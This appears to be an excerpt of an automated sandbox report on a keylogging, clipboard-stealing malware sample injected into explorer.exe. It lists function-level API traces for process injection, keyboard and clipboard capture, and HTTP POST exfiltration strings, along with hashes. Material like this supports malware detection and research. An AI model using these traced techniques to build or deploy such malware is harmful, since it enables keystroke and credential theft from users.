                                                                                                                            • Instruction Fuzzy Hash: FC4136302003005BC714BF758D859BF73A9EB84745F00862EB94D972E2EB789E4996AE
                                                                                                                            Function 00479AE0 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 123 479ae0-479ae5 124 479cad 123->124 125 479aeb-479af8 123->125 124->124 126 479b0a-479b0f 125->126 127 479b11 126->127 128 479b13 127->128 129 479b00-479b05 127->129 130 479b18-479b1a 128->130 131 479b06-479b08 129->131 132 479b23-479b27 130->132 133 479b1c-479b21 130->133 131->126 131->127 132->130 134 479b29 132->134 133->132 135 479b34-479b39 134->135 136 479b2b-479b32 134->136 137 479b3b-479b44 135->137 138 479b48-479b4a 135->138 136->130 136->135 139 479b46 137->139 140 479bba-479bbd 137->140 141 479b53-479b57 138->141 142 479b4c-479b51 138->142 139->138 143 479bc2-479bc5 140->143 144 479b60-479b62 141->144 145 479b59-479b5e 141->145 142->141 148 479bc7-479bc9 143->148 146 479b84-479b93 144->146 147 479b64 144->147 145->144 150 479b95-479b9c 146->150 151 479ba4-479bb1 146->151 149 479b65-479b67 147->149 148->143 152 479bcb-479bce 148->152 154 479b70-479b74 149->154 155 479b69-479b6e 149->155 150->150 156 479b9e 150->156 151->151 157 479bb3-479bb5 151->157 152->143 153 479bd0-479bec 152->153 153->148 158 479bee 153->158 154->149 159 479b76 154->159 155->154 156->131 157->131 160 479bf4-479bf8 158->160 161 479b81 159->161 162 479b78-479b7f 159->162 163 479c3f-479c42 160->163 164 479bfa-479c10 LoadLibraryA 160->164 161->146 162->149 162->161 166 479c45-479c4c 163->166 165 479c11-479c16 164->165 165->160 167 479c18-479c1a 165->167 168 479c70-479ca0 VirtualProtect * 2 166->168 169 479c4e-479c50 166->169 171 479c23-479c30 GetProcAddress 167->171 172 479c1c-479c22 167->172 170 479ca4-479ca8 168->170 173 479c63-479c6e 169->173 174 479c52-479c61 169->174 170->170 175 479caa 170->175 176 479c32-479c37 171->176 177 479c39-479c3c 171->177 172->171 173->174 174->166 175->124 176->165
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000478000.00000040.80000000.00040000.00000000.sdmp, Offset: 00478000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_478000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86ad4dce17d5d66b59a335e9c46dcb65276b68e464c2ab6c7f5f20788b5df211
                                                                                                                            • Instruction ID: 0d014601f207436a0e699606bd555c92a3004ec98f8554e091ea031b4c86459f
                                                                                                                            • Opcode Fuzzy Hash: 86ad4dce17d5d66b59a335e9c46dcb65276b68e464c2ab6c7f5f20788b5df211
                                                                                                                            • Instruction Fuzzy Hash: 26511B71A442525EDB218A78DCC07E177A4FB52324B28473AC5EDC73C5E79C6C06C799
                                                                                                                            Function 0047276D Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 178 47276d-47277f OpenFileMappingA 179 472794-472798 178->179 180 472781-472791 MapViewOfFile 178->180 180->179
                                                                                                                            APIs
                                                                                                                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00472777
                                                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,004710FE), ref: 00472789
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$MappingOpenView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3439327939-0
                                                                                                                            • Opcode ID: 67b9db2db91f856543e84ad09ff61f0cf92298acb1f5034ee2c868e1ecc6af0f
                                                                                                                            • Instruction ID: b958134215c59e1b4e2d81b147134925f30c940117af6f6d28a0adec730310e2
                                                                                                                            • Opcode Fuzzy Hash: 67b9db2db91f856543e84ad09ff61f0cf92298acb1f5034ee2c868e1ecc6af0f
                                                                                                                            • Instruction Fuzzy Hash: 87D01732701232BBE3385E7B6C0DF83AE9DDF86AE2B014025B50DD2150D6608810C6F4
                                                                                                                            Function 0047275A Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 181 47275a-47276c UnmapViewOfFile CloseHandle
                                                                                                                            APIs
                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000,?,0047129A,00000001), ref: 0047275E
                                                                                                                            • CloseHandle.KERNELBASE(?,?,0047129A,00000001), ref: 00472765
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFileHandleUnmapView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2381555830-0
                                                                                                                            • Opcode ID: d37c8bdbc55deb7a4a78269f6add7823d7648cf4b74196e3c67522b266a8dce0
                                                                                                                            • Instruction ID: 4dc1c12aaac84318bdaee893cbf38f77dc13cf6b9fd738b2f3cca6676a1a41e1
                                                                                                                            • Opcode Fuzzy Hash: d37c8bdbc55deb7a4a78269f6add7823d7648cf4b74196e3c67522b266a8dce0
                                                                                                                            • Instruction Fuzzy Hash: F6B0123240507197C3142F347C0C8DB3E18FE492233054164F20D8101847240A81A6ED
                                                                                                                            Function 00472A09 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 182 472a09-472a19 GetProcessHeap RtlAllocateHeap
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000A000,004710BF), ref: 00472A0C
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00472A13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357844191-0
                                                                                                                            • Opcode ID: cab9d31350eee82f6b681238f83a08c53bf8e23316f911460614272b69669186
                                                                                                                            • Instruction ID: 44ef23222b921e47cc262f2f483aa895c0270fcf7edb01de5d9b64096126d031
                                                                                                                            • Opcode Fuzzy Hash: cab9d31350eee82f6b681238f83a08c53bf8e23316f911460614272b69669186
                                                                                                                            • Instruction Fuzzy Hash: 37A002B16501906BDD446FB49D0DF157658A744703F004554724EC50549D7555849725

                                                                                                                            Non-executed Functions

                                                                                                                            Function 004718BF Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208injectionnativesleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00472724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,004729F3,-00000001,0047128C), ref: 00472731
                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 004718F4
                                                                                                                            • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0047192F
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 004719BF
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,00473638,00000016), ref: 004719E6
                                                                                                                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00471A0E
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00471A1E
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00471A38
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00471A40
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471A4E
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471A55
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00471A6B
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00471A72
                                                                                                                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00471A88
                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00471AB2
                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00471AC5
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471ACC
                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471AD3
                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00471AE7
                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00471AFE
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471B0B
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471B11
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471B17
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00471B1A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                            • String ID: 0-8wP,8w$atan$ntdll$opera_shared_counter
                                                                                                                            • API String ID: 1066286714-1929110738
                                                                                                                            • Opcode ID: 84396b93fbdefac977f6376ef4eb73f06408679e0de11dfbe46f7ed8e0b5554e
                                                                                                                            • Instruction ID: 100814e3a55634df8c2fe6b265347e26d39409d0609641261291420f1f3094c9
                                                                                                                            • Opcode Fuzzy Hash: 84396b93fbdefac977f6376ef4eb73f06408679e0de11dfbe46f7ed8e0b5554e
                                                                                                                            • Instruction Fuzzy Hash: D861AF71204345AFD310DF258C84EAB7BECEB48755F00452AF94DD3261D674EE44DBAA
                                                                                                                            Function 00472799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 004727B5
                                                                                                                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004727CD
                                                                                                                            • lstrlen.KERNEL32(?,00000000), ref: 004727D5
                                                                                                                            • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 004727E0
                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 004727FA
                                                                                                                            • wsprintfA.USER32 ref: 00472811
                                                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 0047282A
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00472834
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                            • String ID: %02X
                                                                                                                            • API String ID: 3341110664-436463671
                                                                                                                            • Opcode ID: 794685f1bafa42d71dd679b91b09e9faab9044f37ba05a5f434ac126f96e30d7
                                                                                                                            • Instruction ID: b5839d302c9b2f54d9c589ee91886ac8e52ad4fbc0b8754ee227f4eb79c111e7
                                                                                                                            • Opcode Fuzzy Hash: 794685f1bafa42d71dd679b91b09e9faab9044f37ba05a5f434ac126f96e30d7
                                                                                                                            • Instruction Fuzzy Hash: 5F115B71900148BFDB119F95EC88EEEBFBCEB48306F104476F608E2150D6754F81AB68
                                                                                                                            Function 0047162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?), ref: 00471652
                                                                                                                            • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0047167A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: KeyboardStateUnicode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3453085656-3916222277
                                                                                                                            • Opcode ID: 725a35a2e42070b76e1e489305640ef8ab121efbd349cf4fc9f3f91cdcb0e87f
                                                                                                                            • Instruction ID: e893def3d7d8de89e43d7e83e4f7fc9d41406ff3431e090362ad313fb465fd08
                                                                                                                            • Opcode Fuzzy Hash: 725a35a2e42070b76e1e489305640ef8ab121efbd349cf4fc9f3f91cdcb0e87f
                                                                                                                            • Instruction Fuzzy Hash: E901C8319002055BDB30CB18DD45BFB737CEF05701F08842BE909D2261D738DA918AA9
                                                                                                                            Function 004713AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144libraryloaderthreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlZeroMemory.NTDLL(00475013,0000001C), ref: 004713C8
                                                                                                                            • VirtualQuery.KERNEL32(004713AE,?,0000001C), ref: 004713DA
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0047140B
                                                                                                                            • GetCurrentProcessId.KERNEL32(00000004), ref: 0047141C
                                                                                                                            • wsprintfA.USER32 ref: 00471433
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00471448
                                                                                                                            • GetLastError.KERNEL32 ref: 0047144E
                                                                                                                            • RtlInitializeCriticalSection.NTDLL(0047582C), ref: 00471465
                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00471489
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 004714A6
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004714AF
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 004714D0
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004714D3
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004714F1
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0047150D
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00471514
                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 0047152A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                                                            • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                                                            • API String ID: 3628807430-1779906909
                                                                                                                            • Opcode ID: b8f1996d041ba2748a336bb9570e0b4d0379becd03f1f173060b8be350425bea
                                                                                                                            • Instruction ID: 843a5003397a4c1ad9b6d125fc64b83791091ddd56eb53c7a75f55536f84bcb4
                                                                                                                            • Opcode Fuzzy Hash: b8f1996d041ba2748a336bb9570e0b4d0379becd03f1f173060b8be350425bea
                                                                                                                            • Instruction Fuzzy Hash: 8041A570600344BBD710BF76EC09E9B3BADFB44756B00C42AF50D86261DBB99A449BAD
                                                                                                                            Function 004716B9 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 90stringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.NTDLL(0047582C), ref: 004716C4
                                                                                                                            • lstrlenW.KERNEL32 ref: 004716DB
                                                                                                                            • lstrlenW.KERNEL32 ref: 004716F3
                                                                                                                            • wsprintfW.USER32 ref: 00471743
                                                                                                                            • GetForegroundWindow.USER32 ref: 0047174E
                                                                                                                            • GetWindowTextW.USER32(00000000,00475850,00000800), ref: 00471767
                                                                                                                            • GetClassNameW.USER32(00000000,00475850,00000800), ref: 00471774
                                                                                                                            • lstrcmpW.KERNEL32(00475020,00475850), ref: 00471781
                                                                                                                            • lstrcpyW.KERNEL32(00475020,00475850), ref: 0047178D
                                                                                                                            • wsprintfW.USER32 ref: 004717AD
                                                                                                                            • lstrcatW.KERNEL32 ref: 004717C6
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(0047582C), ref: 004717D3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                                                            • String ID: Clipboard -> $ New Window Caption -> $ PG$%s%s%s$%s%s%s%s$PXG
                                                                                                                            • API String ID: 2651329914-455055589
                                                                                                                            • Opcode ID: 5251a9e92d078e8fde6c6a37dd35730e98917cfc70922d05fb1522b9f0688707
                                                                                                                            • Instruction ID: c0b18b29a69df591af17873c648a4bc9ce574ac7feffb8b4f6476458f6a5f9e6
                                                                                                                            • Opcode Fuzzy Hash: 5251a9e92d078e8fde6c6a37dd35730e98917cfc70922d05fb1522b9f0688707
                                                                                                                            • Instruction Fuzzy Hash: 4C21D630600654BBC3243F3AFD88EAF3B9CEB41B56715C036F40D96271DA598D41A6EE
                                                                                                                            Function 004725F1 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00472603
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0047260B
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0047261B
                                                                                                                            • Thread32First.KERNEL32(00000000,0000001C), ref: 00472629
                                                                                                                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00472648
                                                                                                                            • SuspendThread.KERNEL32(00000000), ref: 00472658
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00472667
                                                                                                                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 00472677
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00472682
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1467098526-0
                                                                                                                            • Opcode ID: 31d0dcf48aae500bc5f1b4e0392986352e438a3027e03b61e7f704bcc565c39f
                                                                                                                            • Instruction ID: 9c00f44c72c6916a2f774b56fd9dbd4a62bcf438a1e6c0506c950b8d0fbd7ff2
                                                                                                                            • Opcode Fuzzy Hash: 31d0dcf48aae500bc5f1b4e0392986352e438a3027e03b61e7f704bcc565c39f
                                                                                                                            • Instruction Fuzzy Hash: 33117371405250EFD7119F60AD4CAAFBBA8FF44706F00442AF64992254D7748A89ABAB
                                                                                                                            Function 004720A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 295 4720a1-4720fc call 47240f call 472a09 call 47298a call 4724cc 304 472117-472123 295->304 305 4720fe-472115 295->305 308 472127-472129 304->308 305->308 309 47212f-472166 RtlZeroMemory 308->309 310 4723fd-47240c call 4729eb 308->310 314 4723f5-4723fc 309->314 315 47216c-472187 309->315 314->310 316 4721b9-4721cb 315->316 317 472189-47219a call 47243d 315->317 322 4721cf-4721d1 316->322 323 4721ad 317->323 324 47219c-4721ab 317->324 325 4721d7-472233 call 47288d 322->325 326 4723e2-4723e8 322->326 327 4721af-4721b7 323->327 324->327 335 4723db 325->335 336 472239-47223e 325->336 330 4723f1 326->330 331 4723ea-4723ec call 4729eb 326->331 327->322 330->314 331->330 335->326 337 472240-472251 336->337 338 472258-472286 call 472a09 wsprintfW 336->338 337->338 341 47229f-4722b6 338->341 342 472288-47228a 338->342 348 4722f5-47230f 341->348 349 4722b8-4722ee call 472a09 wsprintfW 341->349 343 47228b-47228e 342->343 344 472290-472295 343->344 345 472299-47229b 343->345 344->343 347 472297 344->347 345->341 347->341 353 472315-472328 348->353 354 4723b8-4723ce call 4729eb 348->354 349->348 353->354 357 47232e-472344 call 472a09 353->357 362 4723d7 354->362 363 4723d0-4723d2 call 4729eb 354->363 364 472346-472351 357->364 362->335 363->362 366 472365-47237c 364->366 367 472353-472360 call 4729ce 364->367 371 472380-47238d 366->371 372 47237e 366->372 367->366 371->364 373 47238f-472393 371->373 372->371 374 472395 373->374 375 4723ad-4723b4 call 4729eb 373->375 377 472395 call 4729bd 374->377 375->354 378 47239a-4723a7 RtlMoveMemory 377->378 378->375
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00472A09: GetProcessHeap.KERNEL32(00000008,0000A000,004710BF), ref: 00472A0C
                                                                                                                              • Part of subcall function 00472A09: RtlAllocateHeap.NTDLL(00000000), ref: 00472A13
                                                                                                                              • Part of subcall function 0047298A: lstrlen.KERNEL32(00474FE2,?,00000000,00000000,004720DD,76228A60,00474FE2,00000000), ref: 00472992
                                                                                                                              • Part of subcall function 0047298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00474FE2,00000001,00000000,00000000), ref: 004729A4
                                                                                                                              • Part of subcall function 004724CC: RtlZeroMemory.NTDLL(?,00000018), ref: 004724DE
                                                                                                                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 00472139
                                                                                                                            • wsprintfW.USER32 ref: 00472272
                                                                                                                            • wsprintfW.USER32 ref: 004722DD
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 004723A7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                            • API String ID: 4204651544-1701262698
                                                                                                                            • Opcode ID: 7dd516415a3292ab8bed37698d4c9775f23f1f550a6f8460499f7751a5bad413
                                                                                                                            • Instruction ID: 53a0ff9e7bbd1b39d2a172e529b580b6441f2a6f57ccce6b2bdb96a44aef6636
                                                                                                                            • Opcode Fuzzy Hash: 7dd516415a3292ab8bed37698d4c9775f23f1f550a6f8460499f7751a5bad413
                                                                                                                            • Instruction Fuzzy Hash: 6EA19F71608340AFD3109F65D984A6BBBE8FF88344F14492EF989D3351DAB8DE448B5A
                                                                                                                            Function 004724CC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 380 4724cc-4724f0 RtlZeroMemory 382 472514 380->382 383 4724f2-472504 380->383 385 472517-472519 382->385 383->382 384 472506-472512 383->384 384->385 386 472554-472559 385->386 387 47251b-472545 385->387 390 472547-47254a 387->390 391 47254c-472553 387->391 390->391 391->386
                                                                                                                            APIs
                                                                                                                            • RtlZeroMemory.NTDLL(?,00000018), ref: 004724DE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryZero
                                                                                                                            • String ID: G$OG$OG$OG G
                                                                                                                            • API String ID: 816449071-3684225115
                                                                                                                            • Opcode ID: 31839f73adcb72787bb032c66cb2d1658c383810fd48b73d8b39dc77f59e3597
                                                                                                                            • Instruction ID: 57e198ae3363cdcb0562caca596906e57f700eaf6983b78f77aea6a47301d5ee
                                                                                                                            • Opcode Fuzzy Hash: 31839f73adcb72787bb032c66cb2d1658c383810fd48b73d8b39dc77f59e3597
                                                                                                                            • Instruction Fuzzy Hash: 9311E3B1A01209AFDB10DFA9D984ABFB7BDEB48701B104029F949E3240E7749E44DB65
                                                                                                                            Function 0047182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42sleepstringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.NTDLL(0047582C), ref: 00471839
                                                                                                                            • lstrlenW.KERNEL32 ref: 00471845
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(0047582C), ref: 004718A9
                                                                                                                            • Sleep.KERNEL32(00007530), ref: 004718B4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                                            • String ID: ,XG
                                                                                                                            • API String ID: 2134730579-1422681593
                                                                                                                            • Opcode ID: 364b34ee7368b1f7957a47b10d8fe88c17ee6f0a384e552543fc0330ff87b86d
                                                                                                                            • Instruction ID: c3b96b7d5bff35bb7aca6b337163fd476634f9d9067e12b1351a749014a5afab
                                                                                                                            • Opcode Fuzzy Hash: 364b34ee7368b1f7957a47b10d8fe88c17ee6f0a384e552543fc0330ff87b86d
                                                                                                                            • Instruction Fuzzy Hash: EB01A771A11540ABD3247F76EE1A8AE3AA9EB41705704803EF10D8B261DAB88D41D7AF
                                                                                                                            Function 004712AE Relevance: 7.6, APIs: 5, Instructions: 93stringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
